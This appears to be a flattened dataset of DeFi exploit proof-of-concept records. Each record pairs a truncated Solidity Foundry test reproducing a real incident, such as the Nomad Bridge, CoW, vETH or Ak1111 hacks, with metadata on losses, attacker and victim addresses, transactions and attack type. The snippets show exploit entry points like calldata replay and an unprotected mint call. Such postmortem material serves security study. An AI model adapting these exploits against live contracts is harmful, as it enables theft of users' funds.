// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~152M US$ // Attacker(s) : ☠😈👽🤖🐵🌝🤷‍♂️ // Replica contract mistakenly initialize : 0x53fd92771d2084a9bf39a6477015ef53b7f116c79d98a21be723d06d79024cad // Example TXs...
exploit_poc
NomadBridge
2022-08
NomadBridge_exp.sol
null
6d18e0ae0f31569b
2026-01-07T10:59:16.546167
postmortems
ethereum
15,259,100
~152M US$
152,000,000
null
null
null
null
https://www.certik.com/resources/blog/28fMavD63CpZJOKOjb9DX3-nomad-bridge-exploit-incident-analysis
null
true
true
false
critical
~152M US$
unknown
function testExploit() public { console.log( "Attackers can copy the original user's transaction calldata and replacing the receive address with a personal one." ); console.log("We mock how attackers/whitehats replay the calldata at block 15259100\n"); // Txhash : 0xa5fe9d044e4f3e5aa...
true
~152M US$
$152.00M
6.73
medium
NomadBridge Exploit (2022-08)
true
false
false
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "./../interface.sol"; // Pool1: UniswapV2 WETH/USDT // Pool2: UniswapV2 WETH/XST // https://tools.blocksec.com/tx/eth/0x873f7c77d5489c1990f701e9bb312c103c5ebcdcf0a472db726730814bfd55f3 contract XSTExpTest is Test { ...
exploit_poc
XST
2022-08
XST_exp.sol
null
4b13f6a0fa4f6c90
2026-01-07T10:59:16.546244
postmortems
unknown
15,310,016
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { uint256 balance = IERC20(WETH).balanceOf(UniswapV20x694f); IUniswapV2Pair(UniswapV20x0d4a).swap(balance * 2, 0, address(this), "0000"); uint256 WETHBalance = IERC20(WETH).balanceOf(address(this)); console.log("now my weth num: %s", WETHBalance / 1e18); ...
true
Unknown
3.71
low
XST Exploit (2022-08)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $8.5k // Attacker : https://bscscan.com/address/0x9f2ecec0145242c094b17807f299ce552a625ac5 // Attack Contract : https://bscscan.com/address/0x9b78b5d9febce2b8868ea6ee2822cb482a85ad74 // Vulnerable Contract : ht...
exploit_poc
proxy_b7e1
2024-11
proxy_b7e1_exp.sol
null
5fe9d6a4581205bb
2026-01-07T10:59:16.546297
postmortems
bsc
44,294,726
$8.5k
8,500
https://bscscan.com/address/0x9f2ecec0145242c094b17807f299ce552a625ac5
https://bscscan.com/address/0x9b78b5d9febce2b8868ea6ee2822cb482a85ad74
https://bscscan.com/address/0xb7e1d1372f2880373d7c5a931cdbaa73c38663c6
https://bscscan.com/tx/0x864d33d006e5c39c9ee8b35be5ae05a2013e556be3e078e2881b0cc6281bb265
https://x.com/TenArmorAlert/status/1860867560885150050
https://x.com/TenArmorAlert/status/1860867560885150050
true
true
false
low
$8.5k
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); // deal(BEP20USDT, address(attC), 8484920000000000000000); attC.attack(); vm....
true
$8.5k
https://bscscan.com/address/0x9f2ecec0145242c094b17807f299ce552a625ac5
https://bscscan.com/address/0x9b78b5d9febce2b8868ea6ee2822cb482a85ad74
https://bscscan.com/address/0xb7e1d1372f2880373d7c5a931cdbaa73c38663c6
https://bscscan.com/tx/0x864d33d006e5c39c9ee8b35be5ae05a2013e556be3e078e2881b0cc6281bb265
https://x.com/TenArmorAlert/status/1860867560885150050
https://x.com/TenArmorAlert/status/1860867560885150050
$8.5K
7.96
medium
proxy_b7e1 Exploit (2024-11)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 33.7k USD // Attacker : https://bscscan.com/address/0x2bee9915ddefdc987a42275fbcc39ed178a70aaa // Attack Contract : https://bscscan.com/address/0x6E088C3dD1055F5dD1660C1c64dE...
exploit_poc
MFT
2024-11
MFT_exp.sol
null
100630baaec17732
2026-01-07T10:59:16.546360
postmortems
bsc
null
33.7k USD
33,700
https://bscscan.com/address/0x2bee9915ddefdc987a42275fbcc39ed178a70aaa
https://bscscan.com/address/0x6E088C3dD1055F5dD1660C1c64dE2af8110B85a8
https://bscscan.com/address/0x29Ee4526e3A4078Ce37762Dc864424A089Ebba11
https://bscscan.com/tx/0xe24ee2af7ceee6d6fad1cacda26004adfe0f44d397a17d2aca56c9a01d759142
null
https://x.com/TenArmorAlert/status/1858351609371406617
true
true
false
medium
33.7k USD
unknown
function testExploit() public balanceLog { //implement exploit code here AttackContract attackContract = new AttackContract(); vm.prank(MSF_EXPLOITER); IERC20(MFT_TOKEN).approve(address(attackContract), type(uint256).max); // Step 0 attackContract.transfer2(MFT_TOKEN, 1...
true
33.7k USD
https://bscscan.com/address/0x2bee9915ddefdc987a42275fbcc39ed178a70aaa
https://bscscan.com/address/0x6E088C3dD1055F5dD1660C1c64dE2af8110B85a8
https://bscscan.com/address/0x29Ee4526e3A4078Ce37762Dc864424A089Ebba11
https://bscscan.com/tx/0xe24ee2af7ceee6d6fad1cacda26004adfe0f44d397a17d2aca56c9a01d759142
https://x.com/TenArmorAlert/status/1858351609371406617
$33.7K
9
high
MFT Exploit (2024-11)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $66K // Attacker : https://etherscan.io/address/0x3a38877312d1125d2391663cba9f7190953bf2d9 // Attack Contract : https://etherscan.io/address/0x285d37b0480910f977cd43c9bd228527bfad816e, https://etherscan.io/addr...
exploit_poc
MainnetSettler
2024-11
MainnetSettler_exp.sol
null
a19a05bcea68d49d
2026-01-07T10:59:16.546422
postmortems
ethereum
21,230,768
$66K
66,000
https://etherscan.io/address/0x3a38877312d1125d2391663cba9f7190953bf2d9
https://etherscan.io/address/0x285d37b0480910f977cd43c9bd228527bfad816e,
null
https://etherscan.io/tx/0xfab5912f858b3768b7b7d312abcc02b64af7b1e1b62c4f29a2c1a2d1568e9fa2
https://x.com/TenArmorAlert/status/1859416451473604902
https://x.com/TenArmorAlert/status/1859416451473604902
true
true
false
medium
$66K
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(hold).balanceOf(attacker), 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of attacker...
true
$66K
https://etherscan.io/address/0x3a38877312d1125d2391663cba9f7190953bf2d9
https://etherscan.io/address/0x285d37b0480910f977cd43c9bd228527bfad816e,
https://etherscan.io/tx/0xfab5912f858b3768b7b7d312abcc02b64af7b1e1b62c4f29a2c1a2d1568e9fa2
https://x.com/TenArmorAlert/status/1859416451473604902
https://x.com/TenArmorAlert/status/1859416451473604902
$66.0K
6.5
medium
MainnetSettler Exploit (2024-11)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 16.3k USD // Attacker : https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca // Attack Contract : // Vulnerable Contract : https://etherscan.io/address/0x050163597d9905ba66400f7b3ca8f2ef23df7...
exploit_poc
ChiSale
2024-11
ChiSale_exp.sol
flash_loan
e86cc3246c0309c3
2026-01-07T10:59:16.546467
postmortems
ethereum
21,132,838
16.3k USD
16,300
https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca
null
https://etherscan.io/address/0x050163597d9905ba66400f7b3ca8f2ef23df702d
https://app.blocksec.com/explorer/tx/eth/0x586a2a4368a1a45489a8a9b4273509b524b672c33e6c544d2682771b44f05e87
https://x.com/TenArmorAlert/status/1854357930382156107
https://x.com/TenArmorAlert/status/1854357930382156107
true
true
true
medium
16.3k USD
flash-loan
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.flashLoan(); vm.stopPrank(); emit log_named_decimal_uint("after attack: ...
true
16.3k USD
https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca
https://etherscan.io/address/0x050163597d9905ba66400f7b3ca8f2ef23df702d
https://app.blocksec.com/explorer/tx/eth/0x586a2a4368a1a45489a8a9b4273509b524b672c33e6c544d2682771b44f05e87
https://x.com/TenArmorAlert/status/1854357930382156107
https://x.com/TenArmorAlert/status/1854357930382156107
$16.3K
8.46
high
ChiSale Exploit (2024-11)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 8.4K // Attacker : // Attack Contract : // Vulnerable Contract : // Attack Tx : https://etherscan.io/tx/0x5e151627dc06ec4f2db5be2f48248f320ad3450aba42b1bbd00131bcbaa4f0ae // @Info // Vulnerable Contract Cod...
exploit_poc
VRug
2024-11
VRug_exp.sol
null
0cb63c6cec375acd
2026-01-07T10:59:16.546511
postmortems
ethereum
21,138,659
8.4K
8,400
null
null
null
https://etherscan.io/tx/0x5e151627dc06ec4f2db5be2f48248f320ad3450aba42b1bbd00131bcbaa4f0ae
https://x.com/TenArmorAlert/status/1854702463737380958
https://x.com/TenArmorAlert/status/1854702463737380958
true
true
false
low
8.4K
unknown
function testPoC() public { vm.startPrank(attacker, attacker); deal(weth9, address(univ2), 3208323423502347412); emit log_named_decimal_uint("before attack: balance of mev", IERC20(weth9).balanceOf(mev), 18); IUniswapV2Pair(univ2).swap(2903872687851807969, 0, address(mev), ""); e...
true
8.4K
https://etherscan.io/tx/0x5e151627dc06ec4f2db5be2f48248f320ad3450aba42b1bbd00131bcbaa4f0ae
https://x.com/TenArmorAlert/status/1854702463737380958
https://x.com/TenArmorAlert/status/1854702463737380958
$8.4K
5.68
medium
VRug Exploit (2024-11)
true
false
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 12.9k USD // Attacker : https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca // Attack Contract : https://bscscan.com/address/0x54588267066ddbc6f8dcd724d88c25e2838b6374 // Vulnerable Contract ...
exploit_poc
X319
2024-11
X319_exp.sol
null
c048334c4e7dc70e
2026-01-07T10:59:16.546549
postmortems
bsc
43,860,720
12.9k USD
12,900
https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca
https://bscscan.com/address/0x54588267066ddbc6f8dcd724d88c25e2838b6374
https://bscscan.com/address/0xedd632eaf3b57e100ae9142e8ed1641e5fd6b2c0
https://app.blocksec.com/explorer/tx/bsc/0x679028cb0a5af35f57cbea120ec668a5caf72d74fcc6972adc7c75ef6c9a9092
https://x.com/TenArmorAlert/status/1855263208124416377
https://x.com/TenArmorAlert/status/1855263208124416377
true
true
false
medium
12.9k USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of attacker", addr...
true
12.9k USD
https://bscscan.com/address/0xe60329a82c5add1898ba273fc53835ac7e6fd5ca
https://bscscan.com/address/0x54588267066ddbc6f8dcd724d88c25e2838b6374
https://bscscan.com/address/0xedd632eaf3b57e100ae9142e8ed1641e5fd6b2c0
https://app.blocksec.com/explorer/tx/bsc/0x679028cb0a5af35f57cbea120ec668a5caf72d74fcc6972adc7c75ef6c9a9092
https://x.com/TenArmorAlert/status/1855263208124416377
https://x.com/TenArmorAlert/status/1855263208124416377
$12.9K
6.87
medium
X319 Exploit (2024-11)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 59K // Attacker : https://etherscan.io/address/0x00bad13fa32e0000e35b8517e19986b93f000034 // Attack Contract : https://etherscan.io/address/0x67004e26f800c5eb050000200075f049aa0090c3 // Vulnerable Contract : ht...
exploit_poc
CoW
2024-11
CoW_exp.sol
null
74fda9c34aa1555e
2026-01-07T10:59:16.546593
postmortems
ethereum
21,135,438
59K
59,000
https://etherscan.io/address/0x00bad13fa32e0000e35b8517e19986b93f000034
https://etherscan.io/address/0x67004e26f800c5eb050000200075f049aa0090c3
https://etherscan.io/address/0x9008d19f58aabd9ed0d60971565aa8510560ab41
https://etherscan.io/tx/0x2fc9f2fd393db2273abb9b0451f9a4830aa2ebd5490d453f1a06a8e9e5edc4f9
https://x.com/TenArmorAlert/status/1854538807854649791
https://x.com/TenArmorAlert/status/1854538807854649791
true
true
false
medium
59K
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.attack(); vm.stopPrank(); emit log_named_decimal_uint("after attack: bal...
true
59K
https://etherscan.io/address/0x00bad13fa32e0000e35b8517e19986b93f000034
https://etherscan.io/address/0x67004e26f800c5eb050000200075f049aa0090c3
https://etherscan.io/address/0x9008d19f58aabd9ed0d60971565aa8510560ab41
https://etherscan.io/tx/0x2fc9f2fd393db2273abb9b0451f9a4830aa2ebd5490d453f1a06a8e9e5edc4f9
https://x.com/TenArmorAlert/status/1854538807854649791
https://x.com/TenArmorAlert/status/1854538807854649791
$59.0K
7.33
medium
CoW Exploit (2024-11)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 10k USD // Attacker : https://bscscan.com/address/0x5af00b07a55f55775e4d99249dc7d81f5bc14c22 // Attack Contract : https://bscscan.com/address/0x6def9e4a6bb9c3bfe0648a11d3fff14447079e78 // Vulnerable Contract : ...
exploit_poc
NFTG
2024-11
NFTG_exp.sol
flash_loan
6ad331b6d0985aa3
2026-01-07T10:59:16.546633
postmortems
bsc
44,348,366
10k USD
10,000
https://bscscan.com/address/0x5af00b07a55f55775e4d99249dc7d81f5bc14c22
https://bscscan.com/address/0x6def9e4a6bb9c3bfe0648a11d3fff14447079e78
https://bscscan.com/address/0x5fbbb391d54f4fb1d1cf18310c93d400bc80042e
https://bscscan.com/tx/0xbd330fd17d0f825042474843a223547132a49abb0746a7e762a0b15cf4bd28f6
https://x.com/TenArmorAlert/status/1861430745572745245
https://x.com/TenArmorAlert/status/1861430745572745245
true
true
true
medium
10k USD
flash-loan
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x55d398326f99059fF775485246999027B3197955).balanceOf(attacker), 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); attC.transfer(); vm.stopPrank(); ...
true
10k USD
https://bscscan.com/address/0x5af00b07a55f55775e4d99249dc7d81f5bc14c22
https://bscscan.com/address/0x6def9e4a6bb9c3bfe0648a11d3fff14447079e78
https://bscscan.com/address/0x5fbbb391d54f4fb1d1cf18310c93d400bc80042e
https://bscscan.com/tx/0xbd330fd17d0f825042474843a223547132a49abb0746a7e762a0b15cf4bd28f6
https://x.com/TenArmorAlert/status/1861430745572745245
https://x.com/TenArmorAlert/status/1861430745572745245
$10.0K
8.46
high
NFTG Exploit (2024-11)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~ $14.1K // Attacker : https://bscscan.com/address/0x709b30b69176a3ccc8ef3bb37219267ee2f5b112 // Attack Contract : https://bscscan.com/address/0xfebfe8fbe1cbe2fbdcfb8d37331f2...
exploit_poc
RPP
2024-11
RPP_exp.sol
null
f994a7d7e55248ca
2026-01-07T10:59:16.546683
postmortems
bsc
null
~ $14.1K
14,100
https://bscscan.com/address/0x709b30b69176a3ccc8ef3bb37219267ee2f5b112
https://bscscan.com/address/0xfebfe8fbe1cbe2fbdcfb8d37331f2c8afd2a4b45
https://bscscan.com/address/0x7d1a69302d2a94620d5185f2d80e065454a35751
https://bscscan.com/tx/0x76c39537374e7fa7f206ed3c99aa6b14ccf1d2dadaabe6139164cc37966e40bd
null
https://x.com/TenArmorAlert/status/1853984974309142768
true
true
false
medium
~ $14.1K
unknown
function testExploit() public balanceLog { AttackContract attackContract = new AttackContract(); attackContract.start(); } receive() external payable {} } contract AttackContract { address attacker; uint256 borrowedAmount = 1_200_000_000_000_000_000_000_000; constructor() { ...
true
~ $14.1K
https://bscscan.com/address/0x709b30b69176a3ccc8ef3bb37219267ee2f5b112
https://bscscan.com/address/0xfebfe8fbe1cbe2fbdcfb8d37331f2c8afd2a4b45
https://bscscan.com/address/0x7d1a69302d2a94620d5185f2d80e065454a35751
https://bscscan.com/tx/0x76c39537374e7fa7f206ed3c99aa6b14ccf1d2dadaabe6139164cc37966e40bd
https://x.com/TenArmorAlert/status/1853984974309142768
$14.1K
7.88
medium
RPP Exploit (2024-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 447k // Attacker : https://etherscan.io/address/0x351d38733de3f1e73468d24401c59f63677000c9 // Attack Contract : https://etherscan.io/address/0x713d2b652e5f2a86233c57af5341db4...
exploit_poc
vETH
2024-11
vETH_exp.sol
flash_loan
f55d540aaef5b978
2026-01-07T10:59:16.546732
postmortems
ethereum
null
447k
447,000
https://etherscan.io/address/0x351d38733de3f1e73468d24401c59f63677000c9
https://etherscan.io/address/0x713d2b652e5f2a86233c57af5341db42a5559dd1
https://etherscan.io/address/0x280a8955a11fcd81d72ba1f99d265a48ce39ac2e
https://etherscan.io/tx/0x900891b4540cac8443d6802a08a7a0562b5320444aa6d8eed19705ea6fb9710b
https://blog.verichains.io/p/veth-incident-with-unknown-mechanism
https://x.com/TenArmorAlert/status/1856984299905716645
true
true
true
high
447k
flash-loan
function testExploit() public balanceLog { //implement exploit code here borrowed_eth = WETH_TOKEN.balanceOf(address(vault)); address[] memory tokens = new address[](1); tokens[0] = address(WETH_TOKEN); uint256[] memory amounts = new uint256[](1); amounts[0] = borrowed_e...
true
447k
https://etherscan.io/address/0x351d38733de3f1e73468d24401c59f63677000c9
https://etherscan.io/address/0x713d2b652e5f2a86233c57af5341db42a5559dd1
https://etherscan.io/address/0x280a8955a11fcd81d72ba1f99d265a48ce39ac2e
https://etherscan.io/tx/0x900891b4540cac8443d6802a08a7a0562b5320444aa6d8eed19705ea6fb9710b
https://blog.verichains.io/p/veth-incident-with-unknown-mechanism
https://x.com/TenArmorAlert/status/1856984299905716645
$447.0K
9.16
high
vETH Exploit (2024-11)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 31.5K USD // Attacker : https://bscscan.com/address/0xCe21C6e4fa557A9041FA98DFf59A4401Ef0a18aC // Attack Contract : https://bscscan.com/address/0xbFD7280B11466bc717EB0053A786...
exploit_poc
Ak1111
2024-11
Ak1111_exp.sol
access_control
3e36994496bd9113
2026-01-07T10:59:16.546786
postmortems
bsc
null
31.5K USD
31,500
https://bscscan.com/address/0xCe21C6e4fa557A9041FA98DFf59A4401Ef0a18aC
https://bscscan.com/address/0xbFD7280B11466bc717EB0053A78675aed2C2E388
https://bscscan.com/address/0xc3B1b45e5784A8efececfC0BE2E28247d3f49963
https://bscscan.com/tx/0xc29c98da0c14f4ca436d38f8238f8da1c84c4b1ee6480c4b4facc4b81a013438
null
https://x.com/TenArmorAlert/status/1860554838897197135
true
true
true
medium
31.5K USD
access-control
function testExploit() public balanceLog { //implement exploit code here IAk1111 ak1111 = IAk1111(AK1111_ADDR); uint256 ak1111Balance = ak1111.balanceOf(CAKE_LP); // this function is lack of access control. anyone call it to mint AK1111 token for free ak1111.nonblockingLzReceive...
true
31.5K USD
https://bscscan.com/address/0xCe21C6e4fa557A9041FA98DFf59A4401Ef0a18aC
https://bscscan.com/address/0xbFD7280B11466bc717EB0053A78675aed2C2E388
https://bscscan.com/address/0xc3B1b45e5784A8efececfC0BE2E28247d3f49963
https://bscscan.com/tx/0xc29c98da0c14f4ca436d38f8238f8da1c84c4b1ee6480c4b4facc4b81a013438
https://x.com/TenArmorAlert/status/1860554838897197135
$31.5K
8.19
high
Ak1111 Exploit (2024-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : $4.75M // Attacker : https://arbiscan.io/address/0xb87881637b5c8e6885c51ab7d895e53fa7d7c567 // Attack Contract : https://arbiscan.io/address/0x0b2bcf06f740c322bc7276b6b90d...
exploit_poc
DeltaPrime
2024-11
DeltaPrime_exp.sol
flash_loan
890feb92d9d411b5
2026-01-07T10:59:16.546834
postmortems
arbitrum
273,278,741
$4.75M
4,750,000
https://arbiscan.io/address/0xb87881637b5c8e6885c51ab7d895e53fa7d7c567
https://arbiscan.io/address/0x0b2bcf06f740c322bc7276b6b90de08812ce9bfe
https://arbiscan.io/address/0x62cf82fb0484af382714cd09296260edc1dc0c6c
https://arbiscan.io/tx/0x6a2f989b5493b52ffc078d0a59a3bf9727d134b403aa6e0bf309fd513a728f7f
null
null
true
false
true
critical
$4.75M
flash-loan
false
$4.75M
https://arbiscan.io/address/0xb87881637b5c8e6885c51ab7d895e53fa7d7c567
https://arbiscan.io/address/0x0b2bcf06f740c322bc7276b6b90de08812ce9bfe
https://arbiscan.io/address/0x62cf82fb0484af382714cd09296260edc1dc0c6c
https://arbiscan.io/tx/0x6a2f989b5493b52ffc078d0a59a3bf9727d134b403aa6e0bf309fd513a728f7f
$4.75M
8
high
DeltaPrime Exploit (2024-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; // @KeyInfo - Total Lost : 80k USD // Attacker : https://bscscan.com/address/0xd4f04374385341da7333b82b230cd223143c4d62 // Attack Contract : https://bscscan.com/address/0x0aD02ce1b8EB978FD8dc4abeC5bf92Dfa81Ed705 // Vulnerable Co...
exploit_poc
Matez
2024-11
Matez_exp.sol
null
d691a68225789328
2026-01-07T10:59:16.546907
postmortems
bsc
null
80k USD
80,000
https://bscscan.com/address/0xd4f04374385341da7333b82b230cd223143c4d62
https://bscscan.com/address/0x0aD02ce1b8EB978FD8dc4abeC5bf92Dfa81Ed705
https://bscscan.com/address/0x326FB70eF9e70f8f4c38CFbfaF39F960A5C252fa
https://bscscan.com/tx/0x840b0dc64dbb91e8aba524f67189f639a0bc94ee9256c57d79083bb3fd46ec91
null
https://x.com/TenArmorAlert/status/1859830885966905670
true
true
false
medium
80k USD
unknown
function testExploit() public balanceLog { //implement exploit code here // due to the integer truncation problem, the following number will be truncated to 0, // This flaw allowed the attacker to transfer a zero amount of tokens while // being recognized by the contract as having stak...
true
80k USD
https://bscscan.com/address/0xd4f04374385341da7333b82b230cd223143c4d62
https://bscscan.com/address/0x0aD02ce1b8EB978FD8dc4abeC5bf92Dfa81Ed705
https://bscscan.com/address/0x326FB70eF9e70f8f4c38CFbfaF39F960A5C252fa
https://bscscan.com/tx/0x840b0dc64dbb91e8aba524f67189f639a0bc94ee9256c57d79083bb3fd46ec91
https://x.com/TenArmorAlert/status/1859830885966905670
$80.0K
7.33
medium
Matez Exploit (2024-11)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; interface IAggregationRouter { struct SwapParams { address srcToken; address dstToken; uint256 amount; address payable executor; bytes executeParams; bytes extraData; } ...
exploit_poc
Kame
2025-09
Kame_exp.sol
null
c41444eada1d81c7
2026-01-07T10:59:16.546953
postmortems
unknown
null
18167.880000 USD
18,167.88
https://seiscan.io//address/0xd43d0660601e613f9097d5c75cd04ee0c19e6f65
null
https://seiscan.io//address/0x14bb98581ac1f1a43fd148db7d7d793308dc4d80
https://seiscan.io//tx/0x6150ec6b2b1b46d1bcba0cab9c3a77b5bca218fd1cdaad1ddc7a916e4ce792ec
null
https://x.com/SupremacyHQ/status/1966909841483636849
true
true
false
medium
18167.880000 USD
unknown
function testExploit() public balanceLog { router.swap(createSwapParams(syUSD, USDC, targetToTakeFrom)); }
true
18167.880000 USD
https://seiscan.io//address/0xd43d0660601e613f9097d5c75cd04ee0c19e6f65
https://seiscan.io//address/0x14bb98581ac1f1a43fd148db7d7d793308dc4d80
https://seiscan.io//tx/0x6150ec6b2b1b46d1bcba0cab9c3a77b5bca218fd1cdaad1ddc7a916e4ce792ec
https://x.com/SupremacyHQ/status/1966909841483636849
$18.2K
7.34
medium
Kame Exploit (2025-09)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1647307128267476992 // https://twitter.com/danielvf/status/1647329491788677121 // https://twitter.com/hexagate_/status/1647334970258608131 // ...
exploit_poc
HundredFinance_2
2023-04
HundredFinance_2_exp.sol
flash_loan
8b9068a3b9474214
2026-01-07T10:59:16.547011
postmortems
ethereum
90,760,765
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
4
low
HundredFinance_2 Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BeosinAlert/status/1642372700726505473 // @Tx // https://bscscan.com/tx/0x7ff1364c3b3b296b411965339ed956da5d17058f3164425ce800d64f1aef8210 interface IPool { ...
exploit_poc
Allbridge
2023-04
Allbridge_exp.sol
flash_loan
a6fda2dc504b0dd2
2026-01-07T10:59:16.547102
postmortems
bsc
26,982,067
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
3.17
low
Allbridge Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import { ICErc20Delegate, IERC20, IUnitroller, IAaveFlashloan, IBalancerVault, Uni_Pair_V2, Uni_Pair_V3 } from "./../interface.sol"; // @KeyInfo // Project: https://twitter.com/0vixProtocol // Date...
exploit_poc
0vix
2023-04
0vix_exp.sol
flash_loan
99a3dc950cef7074
2026-01-07T10:59:16.547170
postmortems
polygon
42,054,768
~@2M US$
2,000,000
null
null
null
https://polygonscan.com/tx/0x10f2c28f5d6cd8d7b56210b4d5e0cece27e45a30808cd3d3443c05d4275bb008
null
null
true
false
true
critical
~@2M US$
flash-loan
false
https://polygonscan.com/tx/0x10f2c28f5d6cd8d7b56210b4d5e0cece27e45a30808cd3d3443c05d4275bb008
$2.00M
7
medium
0vix Exploit (2023-04)
true
false
true
false
pragma solidity ^0.8.0; import "forge-std/Test.sol"; import "forge-std/console.sol"; import "./../interface.sol"; // It's a postmortem, now it's disclosed, just for studying. // analysis and code: https://medium.com/immunefi/silo-finance-logic-error-bugfix-review-35de29bd934a interface ISilo { function deposit(...
exploit_poc
silo_finance
2023-04
silo_finance_exp.sol
null
14a16c9bde54cfd9
2026-01-07T10:59:16.547296
postmortems
unknown
17,139,470
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testAttack() public { address LINK = 0x514910771AF9Ca656af840dff83E8264EcF986CA; address WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; console.log("time stamp before = ", block.timestamp); console.log("block number before = ", block.number); siloBugFixReview.run()...
true
Unknown
5
medium
silo_finance Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @Analysis https://twitter.com/PeckShieldAlert/status/1645980197987192833 https://twitter.com/Phalcon_xyz/status/1645963327502204929 @TX (one of the txs) invest https://bscscan.com/tx/0xdb01fa33bf5b79a...
exploit_poc
MetaPoint
2023-04
MetaPoint_exp.sol
null
c1e2139eddbcb4a8
2026-01-07T10:59:16.547358
postmortems
bsc
27,264,384
null
null
null
null
null
null
null
null
false
true
false
medium
null
unknown
function testExploit() public { address[11] memory victims = [ 0x724DbEA8A0ec7070de448ef4AF3b95210BDC8DF6, 0xE5cBd18Db5C1930c0A07696eC908f20626a55E3C, 0xC254741776A13f0C3eFF755a740A4B2aAe14a136, 0x5923375f1a732FD919D320800eAeCC25910bEdA3, 0x68531F3d3A2...
true
Unknown
3.41
low
MetaPoint Exploit (2023-04)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/peckshield/status/1643417467879059456 // https://twitter.com/spreekaway/status/1643313471180644360 // https://medium.com/coinmonks/theoretical-practical-balance...
exploit_poc
Sentiment
2023-04
Sentiment_exp.sol
flash_loan
c8a76b858de145be
2026-01-07T10:59:16.547408
postmortems
arbitrum
77,026,912
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
false
Unknown
4
low
Sentiment Exploit (2023-04)
false
false
false
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/cmichelio/status/1646422861219807233 // https://twitter.com/BeosinAlert/status/1646481687445114881 // @TX // https://etherscan.io/tx/0x055cec4fa4614836e54ea2e5cd3d14247ff3d61b85aa2a41f8cc876d131e032...
exploit_poc
YearnFinance
2023-04
YearnFinance_exp.sol
flash_loan
903cfd74c4cf2458
2026-01-07T10:59:16.547502
postmortems
ethereum
17,036,774
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { init(); run(); emit log_named_decimal_uint("[End] Attacker USDC balance after exploit", usdc.balanceOf(address(this)), 6); emit log_named_decimal_uint("[End] Attacker DAI balance after exploit", dai.balanceOf(address(this)), 18); emit log_named...
true
Unknown
6
